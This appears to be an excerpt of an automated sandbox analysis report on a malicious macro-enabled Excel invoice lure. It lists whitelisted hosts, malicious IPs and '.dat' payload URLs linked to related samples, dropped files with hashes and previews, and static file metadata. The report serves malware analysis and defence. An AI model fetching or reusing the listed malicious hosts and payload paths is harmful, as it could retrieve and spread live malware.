                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 204.79.197.200, 13.107.21.200, 20.82.209.183, 13.64.90.137, 40.88.32.150, 92.122.145.220, 52.109.32.63, 52.109.8.25, 52.109.12.23, 184.30.24.56, 20.50.102.62, 92.122.213.247, 92.122.213.194, 20.54.26.129
                                                                                                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                91.211.91.81Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                5.34.179.36Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                45.153.229.23Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                GREENFLOID-ASUAOutstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                tetup.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.181.174.176
                                                                                                                                                ba820cf3_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                a8331229_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                5f0e0f15_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                2f50000.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.90.59.62
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                EgW5u2WYG2.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.99
                                                                                                                                                7IXb5bOTOQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.61
                                                                                                                                                DU61r0xvZ7.exeGet hashmaliciousBrowse
                                                                                                                                                • 82.118.23.184
                                                                                                                                                TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.90.195.7
                                                                                                                                                10ba8cb2_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                HOSTFORYUAOutstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.71

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\698326C4-F3C9-4F7A-9780-B9A6310F518E
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134558
                                                                                                                                                Entropy (8bit):5.368373029498036
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:KcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:xEQ9DQW+zPXO8
                                                                                                                                                MD5:09AAD591D6C7421D5403B747A8A507CB
                                                                                                                                                SHA1:40C1BAD480EFEB61B428FEFE431B3BD08D66924E
                                                                                                                                                SHA-256:4FAA4DF5D1BCAF50BE5DEAD81D9F838311C7F13421C20EAB5244CBEDCC5AE5DF
                                                                                                                                                SHA-512:491D63D471B44DF827FE0AB6EAC0B07E0010A3C07CB9CB053BBB2A0DC560734117F72B29E4AD61B479967F97BC4724E759F6A92A89E8FA5790BEB94D4ECF9EF3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T16:18:21">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\525F9C41.jpg
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92379
                                                                                                                                                Entropy (8bit):7.654577060340879
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                C:\Users\user\AppData\Local\Temp\D2C10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119842
                                                                                                                                                Entropy (8bit):7.698152248037747
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:XTyDCBC5k6vKINbjvw548LMb/oqKO8NnS8+60KcrT:XAOAbT648LM7D98Np+EET
                                                                                                                                                MD5:BA6647E58EA898FD6D91DA13C5779F52
                                                                                                                                                SHA1:734D8591398D1E6974622A9BA4464CF9B0BC3478
                                                                                                                                                SHA-256:6AD237D83CF49EDB35D6896CEE306AF48CEDA52A98A81F557411BA3409AB0BD9
                                                                                                                                                SHA-512:A69F21F4C487F1BBC407572DE0C46B5A2C3DEFF62FF25298B6A1A30C12B7E7ED51A13C5F82E3465E7F8BDF9DB440E470A2724C85010C51BCCFDE160D5243794C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):170164
                                                                                                                                                Entropy (8bit):4.3668951074611355
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:fErLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fEg8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                MD5:A25FC048559E8CB2321BDD82F55EF07D
                                                                                                                                                SHA1:8D2C04AFEBEEB2BA13170ED61E7D0BCFE49C0DFB
                                                                                                                                                SHA-256:B41B782DD524BFB02577F4646CD3E4D943EC93196D21C9C0D1E8FB5310226FF9
                                                                                                                                                SHA-512:4AB32B26EDC385F70BF5736A717A8519AEC9577706C5384E82670C099D836BCB70455017B5231E0BB87E3D017C8F8C94ED5CBBEE0A942A794EF9412561036D07
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Wed May 5 00:18:28 2021, atime=Wed May 5 00:18:28 2021, length=16384, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):909
                                                                                                                                                Entropy (8bit):4.688922941049221
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8kcJRUdl6CHiDS9AGXtDSD+W+jA0/y1bDydLkeGLkeM4t2Y+xIBjKZm:8pHORxA0KJDyz7aB6m
                                                                                                                                                MD5:A47DEE1BB3E65C04EA2D4AA24B5201AD
                                                                                                                                                SHA1:EEFB8E2D3902E5BB2B8B73D1CE70401DE975709B
                                                                                                                                                SHA-256:3AF2EFB881951F79C3D32927A273841F55AA423B3E16873AF9BAF9796D524EFD
                                                                                                                                                SHA-512:2E15CF3B1B1CB58A32064067E370A60D34DEC936CF9EAC8918113163BA622B52ECEC733B98D0A0D1225633A83E3B6F07164FE77FC76362BBF21F067FD47CFC17
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F............-...a..LA..C...LA...@......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...RB.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..RB......S........................a.l.f.o.n.s.....~.1......RN...Desktop.h.......NM..RN......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......688098...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1754918061-05042021.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:06 2020, mtime=Wed May 5 00:18:28 2021, atime=Wed May 5 00:18:28 2021, length=119833, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2390
                                                                                                                                                Entropy (8bit):4.704468169094095
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8uKrOYzfSy6KHPB6puKrOYzfSy6KHPB6:8uKNqYHPKuKNqYHP
                                                                                                                                                MD5:9C0F326D63D79785D53DF29A79AE2E87
                                                                                                                                                SHA1:4904FCF1C97BD7592B9DC3861BBACE9215E5151B
                                                                                                                                                SHA-256:70BE209F25AC72F18411206B93C21FF004FB75EC50AD2ECE1FF3EA92ADBD0D70
                                                                                                                                                SHA-512:9CD386CAC31777953DB755D0E63CC8426A191FACBCCB5CB6EEC101BE7B8F59566962F58BEC334F7E76BD8F67E691A9D10573DC9056766B7E6F50532ACB3D0364
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ....j.8.......LA..D&..LA...............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...RB.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..RB......S........................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..RB......Y..............>.....J.N.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......RH. .OUTSTA~1.XLS.........>Q.u.RH.....f.....................O0}.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.5.4.9.1.8.0.6.1.-.0.5.0.4.2.0.2.1...x.l.s.m.......p...............-.......o...........>.S......C:\Users\user\Desktop\Outstanding-Debt-1754918061-05042021.xlsm..@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.5.4.9.1.8.0.6.1.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...Aw...`.......X.......688098...........!a..%.H.VZAj....Zt.+........W...!a..%.H.VZAj....Zt.+........W..............1SPS.X
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):163
                                                                                                                                                Entropy (8bit):4.89170302234845
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomxWhl2BbtH58ZK6lyEW92BbtH58ZK6lmxWhl2BbtH58ZK6lv:djSlWO7W9WO/lWO1
                                                                                                                                                MD5:DB18784CD80F10B1778579AD9358AA08
                                                                                                                                                SHA1:A0477CFB7A64AC166B8402F78327CC4982A5B3BB
                                                                                                                                                SHA-256:A567BE3CF59A8EAB1E425508C0ECD6F4CAF8A256753A689E629E3761EAC3532A
                                                                                                                                                SHA-512:C6E237BC4AB7A6B8CACA3ED347B5B3C848B019DB47C4D6E9FADDAF6E9BDA215CBED25EF3D6A4272FDCC4155F12D8D860CDB6F33BD1D9B2885684CB4B3FB63443
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1754918061-05042021.LNK=0..Outstanding-Debt-1754918061-05042021.LNK=0..[misc]..Outstanding-Debt-1754918061-05042021.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22
                                                                                                                                                Entropy (8bit):2.9808259362290785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                C:\Users\user\Desktop\94C10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119833
                                                                                                                                                Entropy (8bit):7.6983314215855625
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hyCDivKINbjvw548LMb/oqKO8NnS8+60Kcr0:ljAbT648LM7D98Np+EE0
                                                                                                                                                MD5:DCC5E5AC2D3807E135A105D80F23E6E1
                                                                                                                                                SHA1:D58E9EF6704ACD16475CB8CE64CEB25851026064
                                                                                                                                                SHA-256:2CAD995F11BA81B379312F522858A24F039F73058C54F0B5D91F9FFE9877C78D
                                                                                                                                                SHA-512:92901626E8399B06F8B0810E04561553CA843361C11CFE4C7F584D763524CE7A7CDCA4D95F2259A07B0D5C599AD051B6726729B06C695FA8D94B6A2DC2F929CE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Outstanding-Debt-1754918061-05042021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.68857711695949
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                File name:Outstanding-Debt-1754918061-05042021.xlsm
                                                                                                                                                File size:116934
                                                                                                                                                MD5:5ac72cad6c794e97474276ba534aa095
                                                                                                                                                SHA1:5236650b529792d7aa754c62e1db170a62ecc13d
                                                                                                                                                SHA256:06b4a994cc6b9629775ebfcf818cd44267af85d7515980d4edc3c174ac47b6da
                                                                                                                                                SHA512:49dd09144dcd2a2564545636491fd4a86c0b7263702d0ccdaa846795ea5d039df832dbf510f02c65e08c62b37e2e21540f8fe833925996a39b3db55914fc5673
                                                                                                                                                SSDEEP:3072:1kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:WAbT648LM7D98Np+EdECx
                                                                                                                                                File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/404114/sample/Outstanding-Debt-1754918061-05042021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
